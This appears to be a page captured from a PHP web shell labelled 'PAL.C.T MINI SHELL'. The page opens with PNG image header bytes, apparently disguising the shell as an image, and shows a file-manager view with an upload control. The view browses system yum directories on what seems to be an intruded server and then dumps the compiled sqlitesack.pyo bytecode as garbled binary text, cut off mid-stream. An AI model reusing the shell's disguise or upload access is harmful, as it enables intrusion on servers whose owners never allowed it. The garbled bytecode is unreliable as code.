php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/lib/python2.6/site-packages/yum/
upload
files >> //usr/lib/python2.6/site-packages/yum/sqlitesack.pyo

[c@sddkZddkZddkZddkZddklZlZlZlZddk	Z	ddk
Z
ddklZl
Z
lZddkZddkZddkZddkZddklZddklZlZddkZddkZddkZdZdZdZd	Zd
ZdZ deeefd
YZ!dei"fdYZ#dZ$dZ%dZ&dZ'dZ(dZ)dS(iN(t
PackageObjecttRpmBasetYumAvailablePackaget
parsePackages(t
executeSQLtsql_esctsql_esc_glob(t
seq_max_split(tto_utf8t
to_unicodecs>fd}i|_i|_|iii|S(s8This decorator converts sqlite exceptions into RepoErrorcsy||SWn|tiij
oj}tidjo?t|dotit|i	qytit|ntit|nXdS(Nitmessage(
tsqlutilstsqlitetErrortsyst
hexversionthasattrtErrorst	RepoErrortstrR
(targstkwargste(tfunc(s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytnewFunc,s(t__name__t__doc__t__dict__tupdate(RR((Rs2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytcatchSqliteException*s

cCs
ti|S(N(tmisct
share_data(tvalue((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_share_data>scCsm||jotS|ptS|o2|o+|ddjo|d|djotS||otStS(Nit?t*(R"R#(tTruetFalse(tmatchtregexp_matchtn((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_parse_pkg_nBs
4
c		Cs|d}||jotS|oG|o@|ddjo/|d|djo|d|djotSd|jod||f|d<d||||f|d<d	||f|d
<d|||f|d<d
|||||f|d<d|||||f|d<nt||d|d|d
|d|d|dg}||jotS|ptSx |D]}||otSqlWtS(NR(iR"R#tnameArchs%s.%ss%s-%s-%s.%stnameVerRelArchs%s-%stnameVers%s-%s-%st
nameVerRels%s:%s-%s-%s.%stenvras%s-%s:%s-%s.%stnevra(R"R#(R$R%tset(	R&R'tdataRtvtrtaR(titem((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt
_parse_pkgNs0

*
!

	cCston|djo(t|||||||otSn|djo t|||dotSn[|djot|||otSn2|djoId	|jo"d
|d|||f|d	<n||d	jotSn|djoRd
|jo%d|d||||f|d
<nt|||d
otSn}|djo|d|jotSnV|djoId	|jo"d
|d|||f|d	<n|d	|jotSn|djoLd
|jo%d|d||||f|d
<n|d
|jotSn|djo||djotSn|djo|d|jotSnY|djo|dotSn8|djo|dptSn|djotSdStS(NteqR&sname.eqs
name.matchR(sarch.eqs
arch.matchsnevr.eqtnevrs%s-%s:%s-%ssnevra.eqsnevra.matchR/s%s-%s:%s-%s.%ssname.insnevr.insnevra.ins	pkgtup.eqtpkgtups	pkgtup.intmarkedtwashedR#(R7smatch(sname.eqs
name.match(sarch.eqs
arch.match(snevra.eqsnevra.match(R%R6R$R)tNone(texcluderR&R'R1RR2R3R4((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_excluder_matchmsd
	
	
	

"	

%	
	

"	

%	
	
	
	
	
ccsSd}xF|D]>}|djo||}n|||joq
n|Vq
WdS(sEliminate duplicate rows from cursor based on field.

    Assuming the result set can be divided into one or more equivalent groups
    of rows based on the given field, this wrapper will yield rows from only
    one of the groups, avoiding duplicates.
    N(R<(tcurtfieldt	first_valtob((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_deduplicates
tYumAvailablePackageSqlitecBseZdZeddZddZedZdZ	dZ
dZdZd	Z
d
edZedZd
d
ZedZdZRS(cCshdd6dd6dd6d	d6|_|i|_|i|_||_d|_t|_d|_	|i
||idjo
d|_n|i|_|i
|_|i|_|i|i|i|i
|if|_d|_d|_dS(
Nt	obsoletest	conflictstrequirestprovidest0(((((tprcotsacktidtrepoidtrepoR<tstateR%t_loadedfilest_filest_read_db_objtepochtpkgIdtversiontvertreleasetreltnametarchR9t
_changelogt_hash(tselfRNtdb_obj((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt__init__s&

				

'	tfgetcCs
|iS((t
_loadFiles(R]((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt<lambda>sc
Cs|o-y||SWq4ttfj
od	SXnxZddddddgD]@}yt||t||WqMttfj
oqMXqMWy@|d|_t|d}||dtf}|g|_Wnttfj
onXd	S(
swread the db obj. If asked for a specific item, return it.
           otherwise populate out into the object what existsRYRZRSRURWtpkgKeyRTt
checksum_typeN(t
IndexErrortKeyErrorR<tsetattrR!RTR$t
_checksums(R]R^R5Rdt	check_sum((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRRs$
	
cGs=t|i|d|i}|i}t||||S(s6 Exec SQL against an MD of the repo, return a cursor. tdb(tgetattrRKRNtcursorR(R]tMDtsqlRtcacheR?((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_sql_MDscCshdd6dd6dd6dd6d	d
6dd6d
d6dd6dd6dd6dd6dd6dd6dd6dd6dd 6}|id!o|id!o
t|n|i||}y)|id"d#||ifi}WnDtij
o5}t	|id$ot
t	|nnX|d%}|d&jo|djo
d'}n|d-jo|djo
d*}n|h	d+d6d+d6d+d6d+d6d+d6d+d(6d+d)6d+d6d+d,6jot|}nt
||||S(.Ntsize_packagetpackagesizetsize_archivetarchivesizetsize_installedt
installedsizet
time_buildt	buildtimetrpm_header_startthdrstarttrpm_header_endthdrendt
location_basetbasepatht
location_hreftrelativepatht	time_filetfiletimetrpm_packagertpackagert	rpm_grouptgroupt
rpm_buildhostt	buildhostt
rpm_sourcerpmt	sourcerpmt
rpm_vendortvendortrpm_licensetlicenseRTtchecksum_valuet__tprimarys'SELECT %s FROM packages WHERE pkgId = ?sno such columniRSRItsummarytdescriptiontiturl(RR(t
startswithtendswithtAttributeErrortgetRpRTtfetchoneRRRRfR<R!Rg(R]tvarnametdb2simplemaptdbnameR3RR ((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt__getattr__sN

 
	


c	Cs|io|iSh}|ii|idd|idd|if}xt|dD]}|d}t|d}t	|d}xb|oZ|o|d|i
}n
|i
}t|i
}|i|gi
|qWq\Wt|_||_|iS(	Ntmdtypet	filelistssrSELECT pkgKey, dirname, filetypes, filenames FROM   filelist JOIN packages USING(pkgKey) WHERE  packages.pkgId = ?Rctdirnamet	filetypest	filenamest/(RPRQRKtpopulateRNRpRTRCtdecodefiletypelisttdecodefilenamelisttpopR!t
setdefaulttappendR$(	R]tresultR?RBRRRtfilenametfiletype((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRa6s,
	
"		cCsg}|ip|i|iijoDy|ii|iddWqjtij
o||_dSXn|idd|if}xet	|dD]T}d|dd}t
|d}t
|d	}|i|t||fqW||_dSdS(
NRt	otherdatatotherswSELECT pkgKey, date, author, changelog FROM   changelog JOIN packages USING(pkgKey) WHERE  pkgId = ? ORDER BY date DESCRcidtdatetauthort	changelog(
R[RNRKtotherdbRRRRpRTRCRRR!(R]RR?RBtc_datetc_authortc_log((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_loadChangelogRs&
	
	 	cCs|i|ifS(N(RdRT(R]((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytreturnIdSumqscCs|i|iS(N(RR[(R]((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytreturnChangelogts
tfilecCsd|o@|io5d}|id||i|f}td|S|iti|||S(s}return list of files based on type, you can pass primary_only=True
           to limit to those files in the primary repodatas=SELECT name as fname FROM files WHERE pkgKey = ? and type = ?RcSs|dS(tfname((tx((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRb~s(RPRpRctmapRaRtreturnFileEntries(R]tftypetprimary_onlyRnR?((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRxs
cCs[|o=|io2d}|id||if}td|S|iti|S(sreturn list of types of files in the package, you can pass
           primary_only=True to limit to those files in the primary repodatas9SELECT DISTINCT type as ftype FROM files WHERE pkgKey = ?RcSs|dS(R((R((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRbs(RPRpRcRRaRtreturnFileTypes(R]RRnR?((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRs
cCsMtidtiddd}|id||i|f}td|S(Ns_simpleFiles() will go away in a future version of Yum.Use returnFileEntries(primary_only=True)
t
stacklevelis=SELECT name as fname FROM files WHERE pkgKey = ? and type = ?RcSs|dS(R((R((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRbs(twarningstwarnRtYumDeprecationWarningRpRcR(R]RRnR?((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytsimpleFiless
	cCs
t|}|djo
d}nt|i|tod|}|id||if}g|i|<x|D]|}|dpqsnt|dt|dt|dt|dt|d	ff}|i|it|qsWnti|||S(
Ntstrong_requiresRGsDSELECT name, version, release, epoch, flags FROM %s WHERE pkgKey = ?RRYtflagsRSRURW(	R!t
isinstanceRJttupleRpRcRRt
returnPrco(R]tprcotypet	printableRnR?RBtprco_set((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRs$




"cCsd}|id||if}g}x|D]}d}|did
jo
d}nt|dt|d	t|d
t|dt|df|f}|i|q.W|S(s%returns requires with pre-require bitsNSELECT name, version, release, epoch, flags,pre FROM requires WHERE pkgKey = ?RRItprettrueit1RYRRSRURW(Ri(RpRctlowerR!R(R]RnR?RGRBRR((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_requires_with_pres


N(Rt
__module__R_tpropertytfilesR<RRRRpRRaRRRR%RRRRR(((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRDs			9				tYumSqlitePackageSackcBseZdZdZedZdZdZdZdZ	edZ
dZd	d
ZdZ
dZd
ZdZdZdZdZdZdZdZedZedZdZdZd<dZddZd<edZ dZ!edZ"edZ#d Z$eed!Z%ed"Z&ed#Z'eed$Z(ed%Z)ed&Z*ed'Z+ed(Z,d<d=d)Z-d<d>d*Z.eged+Z/ed,Z0d-Z1d.Z2d/Z3d0Z4ed1Z5ed<d<ed2Z6ed<d<ed3Z7ed4Z8d<d<ed5Z9ed6Z:d<d<ed7Z;d<d<ed8Z<d<ed9Z=ed<d<d<d<d<d:Z>ed;Z?RS(?s~ Implementation of a PackageSack that uses sqlite cache instead of fully
    expanded metadata objects to provide information cCstii||h|_h|_h|_h|_t|_t|_	h|_
hhd6hd6|_h|_h|_
h|_t|_t|_t|_d|_g|_h|_t|_dS(NRHRG(tyumRepotYumPackageSackR_t	primarydbtfilelistsdbRtexcludesR0t	_excludest_exclude_whitelistt
_all_excludest
_search_cachet_key2pkgt_pkgname2pkgkeyst_pkgtup2pkgst_pkgnames_loadedt_pkgmatch_failst_provmatch_failsR<t
_arch_allowedt_pkgExcludert_pkgExcludeIdsR%t_pkgobjlist_dirty(R]tpackageClass((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyR_s*					
						cGs7t||d|}|i}t||||S(s6 Exec SQL against an MD of the repo, return a cursor. Rj(RkRlR(R]RmRNRnRRoR?((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRpscCs#d}|id||idS(s- Give a count of pkgIds in the given repo DB s!SELECT count(pkgId) FROM packagesRi(RpR(R]RmRNRn((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_sql_MD_pkg_numscsBio1tfdi}|_t_niS(s{ If the pkgobjlist is dirty (possible pkgs on it which are excluded)
            then clean it, and return the clean list. csi|S((t_pkgExcluded(R(R](s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRbs(Rtfiltert
pkgobjlistR%(R]tpol((R]s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_clean_pkgobjlists

	
c	Cst}x8|iiD]'\}}||ijot}PqqW|odSt|dot|iSd}x(|iD]}|t|i|7}q~Wd}x'|iD]}||i	d|7}qW||S(NiRR(
R$RtitemsRR%RtlenRRR(R]tall_excludedRNRotexclude_numtpkg_num((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt__len__s&	

cCst|do
|`nt|do
|`nt|do
|`nt|_h|_h|_t|_	t|_
t|_h|_hhd6hd6|_
tidS(Nt_memoize_requirest_memoize_providesRRHRG(RRRRR%RRRR0RRRRRRtunshare_data(R]((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytdropCachedData	s"


				
cCs|ix;|ii|ii|iiD]}|iq4Wh|_h|_h|_h|_t|_t|_	h|_
g|_h|_t
|_tii|dS(N(RRtvaluesRRtcloseRR0RRRRRR%RRR(R]tdataobj((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRs"
								cCsdS(N((R]((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytbuildIndexes2sterrorcCsdS(N((R]tfailure((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt
_checkIndexes7scs|ii||f||ijof|i|i|ddj	o<|ii}tfd|}||ii<qndS(st Exclude a package so that _pkgExcluded*() knows it's gone.
            Note that this doesn't update self.exclude. cst|tjS((RL(R(tpo(s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRbCsN(RtaddRRR<RR9R(R]RNRctpos((Rs2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt
_delPackageRK:s
cCs|i|ijoh|i|i<nd|i|i|i<|i|if|ijo |ii|i|ifn|i|i|it|_dS(Ni(	RNRRTRcRtdiscardRR$R(R]tobj((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt
delPackageIs cCskt|i|<||ijo|i|=n||ijo|i|=n||ijo|i|=ndS(s% Exclude all packages from the repo. N(R$RRRR(R]RN((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_delAllPackagesRs
cCsB||ijotS||ijo||i|jotStS(N(RR$RR%(R]RNRT((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt	_excluded\s
$cCs<|io||ijotS|io||f|ijS(N(RR$R(R]RNRc((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_pkgKeyExcludedesc
Cs|io||f|ijotS|i||otS|idj	o%||ijo|i||tS|iptSh|id6|||||fd6td6}|i}|i}|i}|i}x|iD]\}	}
}}|	dj	o|	|i	joqn|
i
dd}
t|
djoqn|
\}}toq|djo;t||||||||o|i||tSq|djo+t||||||||oPqq|d	joC|doqt||||||||ot|d<qq|d
joC|dpqt||||||||ot|d<qqqW|ii
||ftS(s Main function to use for "can we use this package" question.
                . Tests repo against allowed repos.
                . Tests pkgKey against allowed packages.
                . Tests arch against allowed arches.
                . Tests addPackageExcluder() calls.
        R(R9R:t.iitexcludetincludetmarktwashN(RR%RR$RR<RRRRLtsplitRR>R(R]RNRcR(RR2R3R4R1RMR=R&R'texSPLITtexTtexM((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_pkgExcludedRKNEVRAksX  
0

"	
"	
"
"c	Cs4|\}}}}}|i|||||||S(sb Helper function to call _pkgExcludedRKNEVRA.
            Takes a repo, pkgKey and a package tuple(R(	R]RNRcR9R(R4RR2R3((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_pkgExcludedRKTsc	CsW|d|d|d|d|df\}}}}}|i|||||||S(si Helper function to call _pkgExcludedRKNEVRA.
            Takes a repo, pkgKey and a dict of package dataRYRZRSRURW(R(	R]RNRcR1R(R4RR2R3((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_pkgExcludedRKDs*cCs|i|i|i|iS(sR Helper function to call _pkgExcludedRKNEVRA.
            Takes a package object. (RRNRcR9(R]R((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRscGsf|dj	o||ijodSd}d}ton|ido|di}n|ido|d}n|idoC|di}ti|otit	i
|i}q
n=|idon)|idon|idon|ii
||||f|dj	ot|i|i|<nt|_t|_dS(	s Add an "excluder" for all packages in the repo/sack. Can basically
            do anything based on nevra, changes lots of exclude decisions from
            "preload package; test; delPackage" into "load excluder".
            Excluderid is used so the caller doesn't have to track
            "have I loaded the excluder for this repo.", it's probably only
            useful when repoid is None ... if it turns out utterly worthless
            then it's still not a huge wart. Ns.eqis.ins.matchs.*s.markeds.washed(R<RR%RRRtre_globtretcompiletfnmatcht	translateR&RRRR0RR$R(R]RMt
excluderidR=RR&R'((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytaddPackageExcluders2#
c	Cs|o|i||odS||ijoh|i|<h|i|<n||i|jod}|id|||fi}|djo d||f}ti|n|o|i|||odS|i	||}||i||<|i
i|igi
||i|i|dg}|i
|n8|o0|i|i||o|i||dS|i||S(s: Lookup a pkg by it's pkgKey, if we don't have it load it sXSELECT pkgKey, pkgId, name, epoch, version, release, arch FROM packages WHERE pkgKey = ?Rs"pkgKey %s doesn't exist in repo %sRYN(RR<RRRpRRRRtpcRRR9RRR(	R]RNRcRRnR1tmsgRtpkgkeys((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt
_packageByKeys,
!
"cCs|o|i|||odS||ijoh|i|<h|i|<n|d|ii|hjop|i||}||i||<|ii|igi	||i|i|dg}|i	|n|i||dS(s= Like _packageByKey() but we already have the data for .pc() RcRYN(
RR<RRRR RRR9R(R]RNRcR1RRR"((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_packageByKeyDatas
 cCs|i|||odS|ii|}|djoh|i|<h|i|<n"|d|jo||diS|d|d|d|d|dfS(sb Like _packageByKeyData() but we don't create the package, we just
            return the pkgtup. RcRYRZRSRURWN(RR<RRRR9(R]RNRcR1tprepo((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_pkgtupByKeyDatas

cCsg}x|iD]y}|ii|hi|g}|pqnxA|D]9}|i||}|djoqLn|i|qLWqW|S(s2 Load all pkgnames from cache, with a given name. N(RRRR#R<R(R]tpkgnametretRNR"tpkgkeytpkg((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_packagesByName"s
!
cCs
||ijo||i|jodSng|i|<||ijoh|i|<n|djotid||fn|djo||i|<nS|djo||i|<n5|djo||i|<ntid||f|i|i|dS(NsTried to add None %s to %stmetadataRRs&Sorry sqlite does not support %s in %s(	taddedRR<RRRRRR(R]RNtdatatypeRtcallback((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytaddDict1s 	




tlikecCs|i|dS(NRH(t
searchPrco(R]RYt
query_type((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt	searchAllNscCs|djo
g}nxi|D]a}|o|i||d|}n|i||d}|djoqn|i|qW|S(sB Takes a cursor and maps the pkgKey rows into a list of packages. RcN(R<R$R#R(R]RNR?tpkgst	have_dataRBR*((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_sql_pkgKey2poRs


cCs9t}x,|iD]!}||ijot}PqqW|S(s6 Are we going to skip every package in all our repos? (R$R-RR%(R]tskip_allRN((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt	_skip_all_s
	cCsd}tii|}ti|p
d}ng}xj|iiD]Y\}}||ijoqHn|i}t	|d||f|i
|||qHWti|S(Ntglobt=s1select DISTINCT pkgKey from files where name %s ?(tostpathtnormpathRRRRRRlRR7tunique(R]RYt	querytypetresultstrepRoR?((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_search_primary_fileshs
cCsjxc|iiD]R\}}||ijoqn|i}t|dx|D]}PqSWtSqWtS(s Return true if pkg.returnFileEntries(primary_only=True) is fast.
            basically does "CREATE INDEX pkgfiles ON files (pkgKey);" exist. sPRAGMA index_info(pkgfiles)(RRRRlRR%R$(R]RBRoR?RB((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_have_fastReturnFileEntriesys
cCs*t|dp|i|_n|iS(sb Is calling pkg.returnFileEntries(primary_only=True) faster than
            using searchFiles(). t_cached_fRFE(RRDRE(R]((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pythave_fastReturnFileEntriesscs|iogSt}td}tii|}tii|}tii||pti|ot	}t	d}ntip
t	n|ddjo|d }ng}ti
|o"ti|p|i|Snt|i
djoNxK|iiD]6\}}||ijoqn|i|ddqWnxo|i
D]d}t|doqgn|id	|}	|id|}
|	|
jo
tint|_qgWg}d
}|pBt\}
}d|}|i||id|
dnpBt\}
}d
|}|i||id|
dndjoxw|i
iD]f\}}||ijoqn|i}|i|t|d|f||i|||qWti|Sx|i
iD]\}}||ijoqn|i}t|d||f|d|g|i|||otiti |nfd}|i!dd|t|d|||i|||qWti|}|S(sYsearch primary if file will be in there, if not, search filelists, use globs, if possibleR:R;iRiRRt_checked_filelists_pkgsRRs(dirname = ? and filenames LIKE ? %s and t%s+dirname GLOB ? and filenames LIKE ? %s and R#sQSELECT pkgKey FROM filelist
                                   WHERE dirname %s ?sselect pkgKey from filelist where                     %s length(filetypes) = 1 and                     dirname || ? || filenames                     %s ?csi|id}pt|jStfd|}x#|D]}i|odSqFWdS(NRcsd|fS(s%s/%s((tf(tsql_dirname(s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRbsii(RtintRR&(RJt
sql_filenamesRtfnsR&(Rtname_ret	file_glob(RJs2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytfilelist_globbers	RPisselect pkgKey from filelist where                              %s length(filetypes) > 1                              and filelist_globber(dirname,filenames)("R9R$R<R=R>RtbasenameRRR%tre_primary_filenameRCRRRRRRRRRRRGRRRlRR7R?RRRRtcreate_function(R]RYtstrictR:R@RR5RNRotpri_pkgstfil_pkgst
sql_paramst
dirname_checktpatterntescRBR?RP((RRNROs2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytsearchFiless













c
Cs|iogSg}t|djo|S|idd}t|\}}d|d||f}x(|dD]}d||||f}qvWxI|iiD]8\}}|i}	t|	||i||	|qW|S(s7search arbitrary fields from the primarydb for a stringit's''s>select DISTINCT pkgKey from packages where %s like '%%%s%%'%s is%s or %s like '%%%s%%'%s (	R9RtreplaceRRRRlRR7(
R]tfieldstsearchstringRRZRnRIRBRoR?((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytsearchPrimaryFieldss"

cCs|iogSg}|p|o|St|tit|joh}xK|D]C}|i||}x(|D] }|i|dd||<qyWqZWx:t|dtidt	D]}|i
|||fqW|Sd}d}	g}
x|D]y}|idd}t|\}}d	|d||f}
x(|dD]}d
|
|||f}
qHW|
i
|
qW|di
|
|	}x|iiD]w\}}|i}t||xO|D]G}|i||d}|djoqn|i
||d
fqWqW|S(ssearch arbitrary fields from the primarydb for a multiple strings
           return packages, number of items it matched as a list of tuplesiitkeytreverses*select pkgKey, SUM(cumul) AS total from ( s$)GROUP BY pkgKey ORDER BY total DESCR\s''s@select pkgKey,1 AS cumul from packages where %s like '%%%s%%'%s s%s or %s like '%%%s%%'%s s UNION ALL RcttotalN(R9Rt	constantstPATTERNS_MAXR`Rtsortedtoperatort
itemgetterR$RR]RtjoinRRRlRR#R<(R]R^t
searchstringsRttotR_tmatchesRtunionstringtendunionstringtselectstsRZRnRIttotalstringRBRoR?RBR*((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt"searchPrimaryFieldsMultipleStrings)sR
 "

c	Cs{|iohS|o
tnh}xH|iiD]7\}}|i}t|dx|D]}t|dt|dt|dt|dt|df}|i||d|oqhnt|dt|d	t|d
t|dt|df\}}	}
}}t|}t||	|
||ff}
|i|gi	|
qhWq<W|S(
Nsselect packages.name as name,                packages.pkgKey as pkgKey,                packages.arch as arch, packages.epoch as epoch,                packages.release as release, packages.version as version,                obsoletes.name as oname, obsoletes.epoch as oepoch,                obsoletes.release as orelease, obsoletes.version as oversion,                obsoletes.flags as oflags                from obsoletes,packages where obsoletes.pkgKey = packages.pkgKeyRYRZRSRURWRctonametoflagstoepochtoversiontorelease(
R9tNotImplementedErrorRRRlRR!RRR(R]tnewestRERBRoR?RBRaR(RIRR2R3tval((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytreturnObsoletes]s4





"!cCsUxN|iiD]=\}}|i}t|d|fx|D]}|SWqWdS(Ns&select * from packages where pkgId = ?(RRRlR(R]RTRBRoR?RB((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytgetPackageDetailsscCsg}t|djo|Stt|}x[|iiD]J\}}|i}t|d|fx|D]}|i|qsWq@W|S(Nis(select * from packages where pkgId in %s(RRRRRRlRR(R]t
pkgId_listR5tpkgid_queryRBRoR?RB((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_getListofPackageDetailssc
	CsCt|d|ph}x|iiD]\}}||ijoq*n|i}t|d|x|D]}t|dt|dt|dt|dt|dff}t|}||df}t|d	}	|	|f}|i|gi|qqWq*Wt	|d||nt
|d|S(
Nt	_memoize_sselect * from %sRYRRSRURWiRc(RRRRRlRR!RRRgRk(
R]RtmemoizeRBRoR?RRzRaR)((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_search_get_memoizes(!cCs8|iohSt|}|djo
d}nt|ttdtfjo||tii|f}n-t|t	t
fjo|||f}nt|}t|}||i|jo|i||Sh}t
o|ii}t}ng}t
}|i|}	x|iiD]\}
}|
|ijoq/nh}x_|	i|
|fgD]E}
|
\}}tii||o|i|gi|qqqqWxJ|iD]<\}}|i|
|}|djoqn|||<qWq/Wx?|D]7\}
}|
|ijoqn|i}t|d||fh}x|D]}
t|
dt|
dt|
dt|
dt|
dff}t|}tii||o!|i|
dgi|qeqeWxJ|iD]<\}}|i|
|}|djoq	n|||<q	WqW|d	jp|dd
jo!|p||i||<n|Sti|pWx3|i|dt
D]}|ddfg||<qW|p||i||<n|Sx>|i|D]-}|ddfg||<||i||<qW|S(Nisselect * from %s where name=?RYRRSRURWRcRHRRT(R9R	R<ttypeRtunicodetrpmUtilst	miscutilststringToVersionRtlistR!RR$RRR%RRRtrangeCompareRRt	iteritemsR#RlRRRRR[RC(R]RRYRRUtreqRtprimarydb_itemstpreloadRRBRottmpRR)RzRcthitsR*R?((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_searchs


"
!



%

cCs|id|||S(NRH(R(R]RYRRU((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytgetProvidesscCs|id|||S(NRG(R(R]RYRRU((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytgetRequiresscCsS|iogSt|d}g}t|}g}xc|D][}||ijoq@n|p||ijo|i|i|q@|i|q@W|o(g}|D]}||iq~}n|p|St	i
}	t||	jo8x0t||	D]}|i|i
||qW|Sg}
d}x|D]}|
idqAW|di|
}x|iiD]\}
}|i}t||||oRxH|D]@}|i|
|d|}|djoqn|i|qWq{n|i|
||dtq{W|p/|iig}|D]
}||q4~n|S(syreturn a list of packages matching any of the given names. This is 
           only a match on package name, nothing elseRs^select pkgId,pkgKey,name,epoch,version,release,arch
                      from packages where sname = ?s OR RcR6N(R9RR0RRtextendR+RR9RdtPATTERNS_INDEXED_MAXRRtsearchNamesRiRRRlRR&R<R7R$R(R]tnamestreturn_pkgtupstloaded_all_namest
returnListt
user_namesR't_[1]R*tmax_entriestpat_sqlstqsqlRYRNRoR?RBR9t_[2]((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRsZ
(	
/c
Cs&|iogSy%ti|\}}\}}}Wn*tij
o}tit|nX|}t|}	|	}t}
d}ti|pt	}
d}ng}g}
xY|i
iD]H\}}|i}t
|d||f|f|i|||qWx|D]}ti|o!|djo|
i|qn|
p:|i||||||ffo|
i|qq|
i|qW|djo|
Sti|p|
S|
i|i|ti|o|
oti|
S|
i|i|ti|
S(s3return list of packages matching name and prcotype R:R;s.select DISTINCT pkgKey from %s where name %s ?RHN(R9Rtstring_to_prco_tupleRt	MiscErrortPackageSackErrorR	R$RR%RRRlRR7tre_filenameR<Rt	checkPrcoRRCRRR?R[(R]RYRR(RIRR2R3tn_btn_uR:R@t
basic_resultsRARBRoR?R((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyR2NsN
%

%
cCsF||ijogS|i|d}|p|ii|n|S(s9return list of packages providing name (any evr and flag)RH(RR2R(R]RYR(((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytsearchProvidesscCs|i|dS(s9return list of packages requiring name (any evr and flag)RG(R2(R]RY((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytsearchRequiresscCs|i|dS(s:return list of packages obsoleting name (any evr and flag)RE(R2(R]RY((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytsearchObsoletesscCs|i|dS(s@return list of packages conflicting with name (any evr and flag)RF(R2(R]RY((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytsearchConflictsscCsdGHdd1dY}|}|d|d|d|d|df|_||_|d	|_|o|Sh|d
d6|dd
6|_h|dd6dd6|dd6|_hdd6|dd6|d	d6|_h|dd6|dd6|_h|dd6|dd6|d d!6|_h	|d"d"6|d#d#6|d$d%6|d&d'6|d(d)6|d*d+6|d,d,6|d-d.6|d/d06|_|S(2Nsdie die die die die db2classt	tmpObjectcBseZRS((RR(((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRsRYRSRURWRZRTRytstartR{tendRthrefRR R}tbasetYEStpkgidRdRRwtbuildRRRqtpackageRstarchiveRut	installedRRRRRRRRRRRRRRR((	R/RKRTthdrangetlocationtchecksumttimetsizetinfo(R]Rjt
nevra_onlyRty((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytdb2classs&	,	
&*'cCs|ptii||||Sg}xR|iiD]A\}}|i}t|d||i|||dtq7W|pt	i
